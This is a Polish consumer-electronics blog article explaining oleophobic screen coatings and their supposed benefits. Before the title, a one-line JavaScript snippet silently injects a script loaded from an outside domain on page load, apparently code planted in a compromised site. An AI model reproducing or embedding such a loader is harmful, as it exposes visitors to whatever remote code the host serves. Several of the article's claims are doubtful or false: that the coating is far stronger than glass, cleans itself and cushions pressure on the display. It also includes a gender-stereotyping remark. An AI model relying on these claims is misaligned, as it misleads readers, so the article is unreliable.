;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Powłoka oleofobowa – czym jest i przed czym chroni ekran? | Silico-Bit
Sprzęt elektroniczny, a w zasadzie jego ekran jest stale narażony na zarysowania i uszkodzenia. Producenci na szczęście zaczęli szukać sposobów na jego ochronę, dzięki czemu obecnie możemy mieć do czynienia z ochroną ekranu dzięki powłoce oleofobowej. Czym jest i w jakich urządzeniach możemy ją znaleźć? Przekonaj się o jej znakomitych właściwościach, które nie tylko chronią ekran, ale także zwiększają komfort użytkowania sprzętu.

Co to jest powłoka oleofobowa?

Wydając spore sumy na sprzęt zależy nam, aby jak najdłużej działał bez zarzutu. Szczególną uwagę zwracamy na ekran – istnieją nawet ubezpieczenia, które zapewniają nam bezpieczeństwo w tym zakresie. Producenci także zaczęli przykładać większą wagę do wytrzymałości ekranu sprzętu elektronicznego.

Powłoka oleofobowa

Powłoka oleofobowa, ku zaskoczeniu wielu konsumentów, jest obecnie stosowana w większości ekranów. Wyglądem przypomina szkło, jednak jest od niego mniej porowata i chropowata. Dzięki temu ma mniej punktów stycznych z cząsteczkami kurzu, wody czy tłuszczu i nie przywierają one tak gęsto do powierzchni ekranu. Ta znakomita właściwość wpływa znacząco na poprawę komfortu użytkowania sprzętu.

Mimo, że producenci raczej nie wspominają o zastosowaniu tej warstwy w specyfikacji produktu, zasługuje ona na szczególne uznanie, ponieważ w znaczny sposób wpływa na jakość i odporność ekranu. Jego czytelność jest bardzo ważna przede wszystkim ze względu na nasz wzrok, którego nie powinniśmy wytężać, szczególnie ze względu na zabrudzony ekran.

Jakie właściwości posiada powłoka oleofobowa?

Powłoka oleofobowa oprócz wspomnianych zalet ma także inne właściwości. Jest znacznie bardziej wytrzymała niż szkło, dlatego jest ono dodatkowo zabezpieczone za pomocą właśnie tej powłoki. Ponadto pomaga w utrzymaniu ekranu w stanie czystości i przejrzystości. Zapewne ta właściwość przypada do gustu szczególnie kobietom, które znacznie częściej zwracają uwagę na tego typu zalety.

Co więcej, taka powłoka samoistnie likwiduje drobne smugi i odciski palców – wpływa więc zbawiennie na estetykę urządzenia. Przy znacznych zabrudzeniach wystarczy przetrzeć ją suchą szmatką. Kiedy chcemy pokazać komuś nasz ekran, nie musimy się zatem martwić o to, że będzie on nieczytelny od smug i odcisków palców.

Jej elastyczna struktura sprawia, że dopasowuje się ona do powierzchni nacisku z zewnątrz, dzięki temu nie musimy obawiać się o zbyt silny nacisk na ekran, a co za tym idzie uszkodzenie matrycy. Co więcej, powłoka oleofobowa zapewnia precyzyjność w odczytywaniu dotyku, więc nie musimy martwić się o z kolei zbyt małą siłę nacisku. Dzięki niej nie musisz także korzystać z rysika – z powodzeniem odczytuje ona dotyk.

Powłoka oleofobowa

Korzyści z posiadania powłoki

Bezsprzecznie najważniejszą korzyścią z posiadania powłoki oleofobowej jest wydłużenie żywotności matrycy. Ponadto powłoka wspomaga mechaniczne właściwości sprzętu i zapewnia bezpieczeństwo użytkowania ekranu. Kupując szkło hartowane do ochrony telefonu czy tabletu nie zdajemy sobie sprawy z tego, że w większości przypadków ta powłoka tam jest. To dzięki niej szkło hartowane jest tak skuteczne.

Poza tym nie musimy zawsze posiadać przy sobie specjalnej mikrofibry do ekranu. Fizycznie jest to niemożliwe, aby przed każdym użyciem telefonu wycierać powierzchnię jego ekranu. Powłoka oleofobowa właściwie czyści się sama, dzięki temu oszczędzamy zarówno czas, jak i pieniądze.

Folia ochronna czy szkło ochronne bez powłoki oleofobowej nie będą tak skuteczne, jak wysokiej jakości szkło hartowane, zawierające powłokę. Na szczęście te akcesoria są dostępne na rynku już dość długo, dzięki czemu nie musimy martwić się o zbyt wygórowaną cenę.